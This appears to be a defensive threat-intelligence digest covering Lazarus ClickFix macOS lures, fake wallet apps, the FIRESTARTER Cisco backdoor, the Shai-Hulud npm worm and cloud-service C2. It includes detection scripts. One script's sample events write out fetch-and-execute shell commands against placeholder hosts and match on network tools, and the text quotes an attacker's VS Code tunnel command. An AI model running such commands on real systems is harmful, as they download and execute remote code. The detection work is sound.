Last updated: July 5, 2026 at 9:01 AM UTC

Lazarus 'Mach-O Man' macOS malware kit hitting fintech and crypto execs through fake Telegram meeting invites and ClickFix terminal commands

ANY.RUN and Dark Reading published research on Mach-O Man, a new macOS malware kit Lazarus is deploying against fintech and crypto executives. The chain begins on Telegram with what looks like a legitimate meeting invite from a known contact, leading to a fake Zoom/Teams/Meet page that displays a fake 'connection issue' and instructs the executive to copy-paste a command into Mac Terminal. That ClickFix command grabs credentials, browser sessions, and Keychain data and exfiltrates over Telegram bot APIs. Lazarus has used the same template across the Drift and KelpDAO compromises, totaling more than $500M stolen in two weeks.

Check
Brief executive, finance, and treasury staff who use Telegram for business communication this week. The lure is a meeting invite from someone they trust, not a cold approach.
Affected
macOS users in executive, finance, business development, and partner-relations roles - particularly those who use Telegram for business. The technique works because the user runs the command themselves, bypassing most preventive controls including macOS endpoint protection. Mach-O Man is not Lazarus-only; other criminal groups have already adopted the kit.
Fix
Train executives never to copy-paste a 'fix' command into Terminal at a meeting page's request, regardless of how legitimate the invite looks. Log and alert on Terminal launches that fetch and execute remote content via curl, wget, osascript, or bash. Hunt for processes in tight infinite loops with Keychain access. Consider Lockdown Mode for high-risk roles.
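One way to implement the "fetch and execute" alert from the Fix above, as an added example (not code from ANY.RUN, Dark Reading, or any vendor). The event field names, hosts, and URLs are constructed assumptions; map them to whatever your EDR or Endpoint Security telemetry emits.

```python
import json
import re

# Constructed process-execution events, one JSON object per line.
# Field names are hypothetical; hosts and URLs are placeholders.
SAMPLE_EVENTS = r"""
{"host":"mac-cfo-01","user":"cfo","parent":"Terminal","cmdline":"curl -fsSL https://meet-fix.example.invalid/r.sh | bash"}
{"host":"mac-bd-07","user":"bizdev","parent":"Terminal","cmdline":"/bin/bash -c \"$(curl -fsSL https://cdn.example.invalid/a)\""}
{"host":"mac-tr-02","user":"treasury","parent":"iTerm2","cmdline":"osascript -e 'do shell script \"curl -s https://x.example.invalid/p | sh\"'"}
{"host":"mac-dev-11","user":"dev","parent":"Terminal","cmdline":"curl -fsSL https://dl.example.invalid/pkg.tgz | shasum -a 256"}
{"host":"mac-dev-11","user":"dev","parent":"launchd","cmdline":"curl -o /tmp/report.pdf https://intranet.example.invalid/report.pdf"}
"""

# A downloader invoked with a URL in the same pipeline stage.
FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&]*https?://", re.I)
# Output piped into an interpreter (the \b keeps "| shasum" from matching).
PIPE_EXEC = re.compile(r"\|\s*(?:sudo\s+)?(?:(?:ba|z|k)?sh|osascript|python3?)\b")
# Shell asked to run whatever a downloader prints: sh -c "$(curl ...)".
SUBST_EXEC = re.compile(r"\b(?:ba|z|k)?sh\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b")
# osascript wrapping a downloader, e.g. via "do shell script".
OSA_FETCH = re.compile(r"\bosascript\b.*\b(?:curl|wget)\b")
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}


def classify(cmdline):
    """Return the reasons a command line looks like fetch-and-execute."""
    reasons = []
    if FETCH.search(cmdline) and PIPE_EXEC.search(cmdline):
        reasons.append("fetch-piped-to-interpreter")
    if SUBST_EXEC.search(cmdline):
        reasons.append("shell-runs-fetched-output")
    if OSA_FETCH.search(cmdline):
        reasons.append("osascript-wraps-fetch")
    return reasons


def hunt(jsonl):
    """Scan JSON-lines process events and return one alert per suspicious event."""
    alerts = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        reasons = classify(ev["cmdline"])
        if reasons:
            # A paste into an interactive terminal is the ClickFix case: rank it higher.
            sev = "high" if ev["parent"] in INTERACTIVE_PARENTS else "medium"
            alerts.append({"host": ev["host"], "user": ev["user"],
                           "severity": sev, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

The two `mac-dev-11` events are the benign controls: a download piped to a checksum tool and a plain file download, neither of which executes what it fetched.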

Kaspersky finds 26 'FakeWallet' apps on Apple's App Store impersonating MetaMask, Coinbase, Trust Wallet, and Ledger to steal crypto seed phrases

Kaspersky identified 26 malicious iOS apps live on the Apple App Store impersonating major cryptocurrency wallets including MetaMask, Coinbase, Trust Wallet, Ledger, TokenPocket, imToken, Bitpie, and OneKey. The campaign, named FakeWallet and linked to the SparkKitty operation, has been running since fall 2025. The apps used typosquatted names, cloned icons, and stub functionality (games, calculators, task planners) to pass App Store review. Some embed compromised viewDidLoad routines that scan the screen for mnemonic words as the user types and exfiltrate seed phrases via RSA-encrypted payloads. Apple removed 25 of the 26 after disclosure; the developer behind the 26th was terminated.

Check
Audit wallet apps installed on any iOS device that holds crypto credentials - your own and team members' devices used for treasury, payroll, vendor payments, or personal investing.
Affected
iOS users who downloaded any of the 26 FakeWallet apps between fall 2025 and the April 2026 takedowns, particularly those with Apple account region set to China. Anyone who entered a seed phrase must assume their wallet is compromised. Cold wallet users are not exempt - some variants embedded into companion apps.
Fix
Review every App Store download under any region, particularly wallet or crypto apps. Cross-check developer names against official wallet websites (MetaMask is ConsenSys, Trust Wallet is DApps Platform Inc., Ledger is Ledger SAS). Any wallet app that asks for your seed phrase is a thief. If exposed, transfer assets to a fresh wallet on known-clean hardware and treat the old seed as burned.

Tropic Trooper ditches Cobalt Strike for AdaptixC2 - new campaign against Taiwan, South Korea, and Japan uses trojanized SumatraPDF, GitHub C2, and VS Code tunnels for remote access

Zscaler ThreatLabz attributed a March 12 campaign to Tropic Trooper (APT23, Earth Centaur, KeyBoy, Pirate Panda), the China-linked group active since 2011. The new wave targets Chinese-speaking users in Taiwan plus targets in South Korea and Japan with AUKUS-themed lures. Two notable changes: a custom AdaptixC2 Beacon listener instead of Cobalt Strike, and GitHub Issues as the C2 channel. The dropper is a trojanized SumatraPDF reader that runs a TOSHIS-variant shellcode loader and drops AdaptixC2 in memory. For high-value victims, operators push VS Code and configure a tunnel ('code tunnel user login --provider github') for full remote access.

Check
Hunt your fleet for unexpected VS Code tunnel sessions from non-developer endpoints and block 'code tunnel user login' outside approved developer accounts.
Affected
Organizations with operations or staff in Taiwan, South Korea, or Japan working on Indo-Pacific security, defense policy, or AUKUS-adjacent topics. Any environment where VS Code is broadly installed (including non-developer roles) is exposed to the tunnel pivot. The trojanized SumatraPDF binary keeps the original signature structure intact in some samples.
Fix
Block .exe masquerading as documents at email and web gateways. Alert on encrypted POSTs to GitHub Issues from non-developer endpoints. Detect the VS Code tunnel pivot by alerting on 'code tunnel user login' from any account without a documented dev workflow. Audit corporate GitHub OAuth grants. Consider removing VS Code from non-developer endpoints entirely.

NASA OIG details how Chinese national Song Wu spear-phished aerospace software from NASA, Air Force, Navy, FAA, universities, and private firms over four years by impersonating colleagues

NASA's Office of Inspector General published a retrospective on April 24 detailing how Chinese national Song Wu, an engineer at a state-owned Chinese aerospace and defense conglomerate, ran a multi-year spear-phishing campaign from January 2017 to December 2021. Song impersonated real US engineers known to his targets and asked over email for copies of specific aerospace modeling software and source code that could design or modify weapons platforms. Targets included staff at NASA, US Air Force, Navy, Army, FAA, major universities, and private aerospace firms. Several victims, believing they were helping a friend, sent the requested software - inadvertently violating US export control laws.

Check
Use the NASA OIG release as a case study in awareness training for engineering and research staff who handle export-controlled or proprietary technical artifacts.
Affected
Aerospace, defense, advanced manufacturing, and dual-use research organizations are the named target set, but the technique generalizes. Any organization whose staff regularly share technical artifacts with external collaborators based on personal trust is at risk. Universities and contractors holding ITAR or EAR-controlled materials face both security risk and legal liability for export-control violations.
Fix
Brief engineering staff on the Song Wu pattern: the lure is an email from someone you actually know asking for software you actually have. Require a non-email verification step (voice or video call) for any inbound request for source code or controlled software. Tighten outbound DLP around CAD, source code, and simulation file transfers, with managerial approval above a defined threshold.

Iran operating like a criminal actor, ex-NSA director says - opportunistic credentials and amplification, not novel exploits

At the Asness Summit in Nashville on April 24, former NSA director Tim Haugh and Mandiant founder Kevin Mandia argued Iran's current cyber posture more closely resembles a criminal actor than a sophisticated APT - reliant on dark-web-purchased credentials, basic security gaps, and information operations to amplify modest intrusions. They cited the March 11 Stryker attack as the template: no malware, no zero-day, just legitimate credentials used to abuse MDM and delete data the attacker had permission to delete. Mandia's CISO advice: assume valid credentials for your staff are already on sale and build detection around their misuse.

Check
Run a credential-monitoring service against your domain this week and put alerts in place for impossible-travel and unusual-MDM-action patterns on admin accounts.
Affected
Any organization with US or Israeli ties, plus their suppliers and contractors, fits the Iranian targeting profile. Acute risk: organizations where MDM, RMM, or any endpoint-management platform can issue destructive commands without out-of-band approval; environments without credential-monitoring services watching dark-web markets for staff logins.
Fix
Subscribe to a credential-monitoring service (HaveIBeenPwned Enterprise, SpyCloud, Flare) and alert on staff credentials surfacing in stealer logs. Require step-up auth on any MDM or RMM destructive action (wipe, uninstall, mass-deploy). Brief comms staff that any Iran-claimed breach should be verified before public response - operators routinely overclaim to amplify modest access.

CISA and UK NCSC warn 'FIRESTARTER' backdoor survives Cisco ASA/Firepower patches - US agency compromised, hardware replacement recommended

CISA and the UK's National Cyber Security Centre jointly published a malware analysis report for FIRESTARTER, a persistent backdoor that China-linked group UAT-4356 (the same crew behind 2024's ArcaneDoor campaign) planted on Cisco ASA and Firepower firewall devices by chaining CVE-2025-20333 (VPN web server RCE) and CVE-2025-20362 (unauthorized access). The implant hooks into Cisco's Service Platform mount list, a boot-time configuration that controls which programs run when the device starts, so it survives reboots, firmware upgrades, and the September 2025 patches for those two CVEs. CISA found FIRESTARTER on an already-patched US federal civilian agency's Cisco Firepower device through continuous network monitoring - attackers silently returned in March 2026 to deploy a second-stage implant called Line Viper without needing to re-exploit the original vulnerabilities. Updated Emergency Directive ED 25-03 now orders federal agencies to audit every Cisco ASA and Firepower device they run and submit device memory snapshots for CISA analysis. The stark guidance for everyone else: if you confirm a compromise, replace the hardware. Reimaging is not enough because the bootloader itself may be implanted.

Check
Inventory every Cisco ASA and Firepower Threat Defense device in your environment - including branch offices, remote sites, and lab gear - and check patch status against CVE-2025-20333 and CVE-2025-20362 as the absolute minimum baseline.
Affected
Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) devices running ASA/FTD software, particularly any units that were internet-exposed and unpatched between the September 2025 patch release and the date you actually applied it. Devices patched in that window may still carry the FIRESTARTER implant because the backdoor survives patching.
Fix
Patch any ASA/FTD device still vulnerable to CVE-2025-20333 or CVE-2025-20362 immediately. Then perform a core dump on every device following CISA's supplemental direction and look for FIRESTARTER indicators described in MAR AR26-113A and the joint advisory AA26-113A. Any device showing indicators of compromise must be replaced with new hardware - do not trust reimaging or factory reset, because the persistence mechanism modifies the Cisco Service Platform mount list and the bootloader may be affected. Rotate all VPN credentials and admin passwords on affected devices. Hunt for Line Viper and review firewall logs for unexpected outbound connections from management interfaces for the period after initial patching.

'Shai-Hulud: The Third Coming' worm pivots from Checkmarx KICS compromise into Bitwarden CLI, stealing SSH keys, cloud secrets, and MCP configs for AI coding tools

TeamPCP's self-propagating supply-chain worm is back in its third iteration, branded 'Shai-Hulud: The Third Coming' in hard-coded strings across the malware. On April 22, Socket reported Checkmarx's official KICS Docker images and a KICS VS Code / Open VSX extension had been trojanized. Bitwarden's own clients repo runs a Checkmarx scan on every pull request via a pull_request_target workflow that holds id-token: write and fetches credentials from Azure Key Vault, so when the poisoned scanner executed it harvested GitHub OIDC and Azure tokens. At 17:57 ET the same day, attackers used those tokens to push a modified publish-cli.yml to the Bitwarden repo and publish a malicious @bitwarden/cli version 2026.4.0 to npm. The package remained live for 93 minutes until Bitwarden pulled it at 19:30 ET. The payload: a 10MB obfuscated credential harvester that grabs SSH keys, cloud provider credentials, npm publish tokens, GitHub tokens, and - new in this variant - MCP (Model Context Protocol) configuration files used by Claude Code, Cursor, and similar AI coding tools. It then self-propagates by republishing into every npm package the victim can modify and uploads encrypted stolen secrets to public GitHub repositories under Dune-themed names. The worm has a Russian-locale kill switch (exits if LC_ALL/LANG starts with 'ru').

Check
Immediately check every CI/CD runner, developer laptop, and container that pulled Checkmarx KICS Docker images, the KICS GitHub Action, or @bitwarden/cli between March 23 and April 23, and rotate every credential that was ever present on those machines.
Affected
Confirmed malicious artifacts per Socket: @bitwarden/cli 2026.4.0 on npm (live 21:57 to 23:30 UTC on April 22, a 93 minute window); compromised Checkmarx KICS Docker images and GitHub Actions (first compromised March 23, re-compromised April 22); two Checkmarx-published Visual Studio Code and Open VSX extensions. Any npm package subsequently republished by a victim whose npm token this worm captured is also potentially malicious.
Fix
Remove the listed versions from all developer environments, CI runners, and private mirrors. Rotate every credential the worm would have seen: GitHub PATs and OIDC tokens, npm publish tokens, cloud provider keys (AWS/GCP/Azure), SSH keys, Azure Key Vault secrets, container registry creds, and MCP config files for AI coding tools - assume every credential stored in ~/.config, ~/.ssh, or exported to CI env is burned. Audit bitwarden/clients commit history for changes to publish-cli.yml and similar pipeline files around April 22. Search public GitHub for repositories named after Dune terms (beautifulcastle-* pattern) to find whether your stolen data has been published. Tighten pull_request_target triggers on security scanners - they should not have id-token: write permission.
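A check for the last point in the Fix above, as an added example (not Bitwarden's, Checkmarx's, or Socket's code): it flags workflows that combine a pull_request_target trigger with a grant of id-token: write. The workflow text is constructed, and the scanner is a line-based heuristic that assumes block-style YAML with two-space job indentation.

```python
import re

# Constructed workflow, not Bitwarden's: a scanner job triggered by
# pull_request_target that can also mint OIDC tokens.
RISKY = """\
name: scan
on:
  pull_request_target:
    types: [opened, synchronize]
permissions:
  contents: read
jobs:
  sast:
    runs-on: ubuntu-latest
    permissions:
      id-token: write   # cloud login to fetch secrets
      contents: read
    steps:
      - uses: actions/checkout@v4
      - run: ./run-scanner.sh
"""

# Same job with the token permission removed.
HARDENED = RISKY.replace(
    "      id-token: write   # cloud login to fetch secrets\n", "")

TOKEN_GRANT = re.compile(r"id-token:\s*write|permissions:\s*write-all")


def audit_workflow(text):
    """Return the scopes ('<workflow>' or a job name) that grant id-token: write
    in a workflow triggered by pull_request_target; [] if there are none."""
    section, job, uses_prt, scopes = None, None, False, set()
    for raw in text.splitlines():
        line = re.sub(r"(^|\s)#.*$", "", raw).rstrip()  # drop YAML comments
        if not line.strip():
            continue
        indent, body = len(line) - len(line.lstrip()), line.strip()
        if indent == 0:
            # New top-level key: on, permissions, jobs, ...
            section, job = body.split(":")[0].strip("'\""), None
        elif section == "jobs" and indent == 2 and body.endswith(":"):
            job = body[:-1]  # entering a job definition
        if section == "on" and re.search(r"\bpull_request_target\b", body):
            uses_prt = True
        if TOKEN_GRANT.fullmatch(body):
            scopes.add(job or "<workflow>")
    return sorted(scopes) if uses_prt else []


if __name__ == "__main__":
    print("risky:", audit_workflow(RISKY))
    print("hardened:", audit_workflow(HARDENED))
```

Run it over every file under `.github/workflows/` and treat any non-empty result on a scanner workflow as a finding to review.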

Trigona ransomware operators ship a custom command-line data-theft tool to speed exfil and reduce dwell time

BleepingComputer reported on April 23 that recent Trigona ransomware intrusions are using a purpose-built command-line exfiltration tool rather than off-the-shelf rclone or MEGAcmd. The custom utility is small, supports parallel uploads, filters by file extension and size before transferring, and logs progress in a format optimized for ransomware operator dashboards. Researchers say the tool reduces dwell time meaningfully - operators are now exfiltrating high-value files in hours rather than days. The shift fits a broader trend (Akira, Black Basta, Play) toward bespoke tooling and away from detectable third-party utilities, making static endpoint signatures less reliable.

Check
Tighten outbound DLP and egress rules around document and source-code repositories - detect bulk reads regardless of which utility is doing the reading.
Affected
Organizations in Trigona's typical victim profile (manufacturing, healthcare, education, mid-market enterprises) without modern data-exfiltration detection. Static endpoint signature lists for rclone, MEGAcmd, FileZilla won't catch this custom tool. Networks without egress-bandwidth alerting on file servers or document-management hosts are equally exposed.
Fix
Switch outbound detection from utility names to behavior: alert on processes opening many files in many directories within a short window, on outbound TLS sessions transferring more than ~500MB from non-server endpoints, and on uploads to consumer cloud storage (Mega, Dropbox personal accounts) from corporate hosts. Add canary files in document repositories and alert on any read.
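The behavioural rule from the Fix above, sketched as an added example (not from BleepingComputer or the researchers it cites): a per-process sliding window over file-open events that alerts on many files across many directories, plus an immediate alert on any canary read. Events, paths, process names, and thresholds are constructed assumptions; the thresholds are set low to fit the sample and need tuning against real file-server telemetry.

```python
from collections import defaultdict, deque
import posixpath

WINDOW_S = 60    # sliding window length in seconds
MIN_FILES = 6    # distinct files opened within the window
MIN_DIRS = 3     # spread across at least this many directories
CANARIES = {"/srv/shares/Finance/wire-instructions-2026.xlsx"}  # constructed


def sample_events():
    """Constructed (timestamp, pid, process, path) file-open events."""
    ev = []
    # Unknown tool walking four share folders in 14 seconds, then a canary.
    for i, d in enumerate(["Finance", "Legal", "HR", "Engineering"]):
        for j in range(2):
            ev.append((100 + i * 4 + j * 2, 4312, "xfer-tool",
                       f"/srv/shares/{d}/doc{j}.docx"))
    ev.append((116, 4312, "xfer-tool", next(iter(CANARIES))))
    # Indexer: many files, but all in one directory.
    ev += [(200 + k, 900, "indexer", f"/srv/shares/Legal/case{k}.pdf")
           for k in range(10)]
    # Office user: several directories, but minutes apart.
    ev += [(1000 + k * 120, 777, "soffice", f"/srv/shares/dept{k % 3}/memo{k}.odt")
           for k in range(6)]
    return ev


def detect(events):
    """Return (ts, pid, process, rule) alerts for bulk reads and canary reads."""
    recent = defaultdict(deque)   # pid -> (ts, path) opens inside the window
    bulk_alerted = set()          # alert once per process for bulk reads
    alerts = []
    for ts, pid, proc, path in sorted(events):
        if path in CANARIES:
            alerts.append((ts, pid, proc, "canary-read"))
        window = recent[pid]
        window.append((ts, path))
        while window and ts - window[0][0] > WINDOW_S:
            window.popleft()      # expire opens older than the window
        files = {p for _, p in window}
        dirs = {posixpath.dirname(p) for p in files}
        if (pid not in bulk_alerted and len(files) >= MIN_FILES
                and len(dirs) >= MIN_DIRS):
            bulk_alerted.add(pid)
            alerts.append((ts, pid, proc, "bulk-read"))
    return alerts


if __name__ == "__main__":
    for alert in detect(sample_events()):
        print(alert)
```

Nothing in the rule depends on the process name, so it fires the same way for rclone, MEGAcmd, or a custom tool.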

New Linux variant of GoGra backdoor uses Microsoft Graph API for stealth C2 - blends in with legitimate Office 365 traffic

Security Affairs covered new research on April 23 documenting a Linux port of the GoGra backdoor, originally seen as Windows-only. The Linux variant retains GoGra's defining feature: it uses Microsoft Graph API as its command-and-control channel, fetching commands from Outlook drafts in an attacker-controlled Microsoft 365 tenant and writing results back to the same drafts. Because the C2 traffic is HTTPS to graph.microsoft.com - the same endpoint legitimate clients hit constantly - it is invisible to most network-layer detections. The Linux port targets enterprise Linux servers with outbound 443 access to Microsoft cloud services, broadening reach onto build servers and jump hosts.

Check
Audit which Linux servers in your environment have outbound HTTPS access to graph.microsoft.com and restrict it to hosts with a documented Microsoft 365 use case.
Affected
Linux servers with outbound HTTPS access to graph.microsoft.com - in most enterprise networks that means almost all of them, since egress filters routinely allow the entire Microsoft 365 endpoint range by default. Build servers, jump hosts, developer workstations, and DMZ services with Linux are the highest-value targets because they often hold credentials and source code.
Fix
Restrict graph.microsoft.com egress to only hosts that genuinely need it (mail relays, M365 integrations). On all other Linux hosts, log and alert on outbound graph.microsoft.com connections. In your M365 tenant, enable audit logging for application registrations and OAuth grants and alert on tokens used from unfamiliar IPs. Rotate credentials for any Linux server that had unsanctioned graph.microsoft.com traffic.

China-linked spies named 'GopherWhisper' targeted Mongolian government using Slack, Discord, and Outlook drafts as their command channel

ESET disclosed GopherWhisper, a previously undocumented China-linked spy group active since at least November 2023 and targeting Mongolian government systems. The group's defining trick: instead of building its own command-and-control servers, it sends instructions through ordinary cloud services - private Slack channels, Discord servers, Outlook draft email folders, and the file.io file-sharing service. Because the malware traffic looks like normal Slack and Discord usage, network monitoring tools largely ignore it. ESET extracted thousands of operator messages from the attackers' own Slack and Discord workspaces, and even found a 'How to write RATs.txt' file in their Downloads folder.

Check
Audit which corporate endpoints have outbound access to slack.com, discord.com, graph.microsoft.com, and file.io without a clear business reason.
Affected
Organizations with operations in Mongolia or staff working on Indo-Pacific affairs. More broadly: any environment where outbound HTTPS to Slack, Discord, Microsoft Graph, or file.io is allowed by default - which is most corporate networks. Build servers, jump hosts, and developer machines are at acute risk because they need outbound HTTPS but have no business reason to talk to Slack or Discord.
Fix
Restrict outbound HTTPS to Slack, Discord, and file.io to only endpoints with a documented business reason. Alert on outbound traffic to those services from servers and developer machines that shouldn't be using them. In Microsoft 365, audit OAuth grants and alert on draft email creation in unfamiliar mailboxes. Block file.io entirely if you have no use case. ESET's GitHub repo lists the indicators.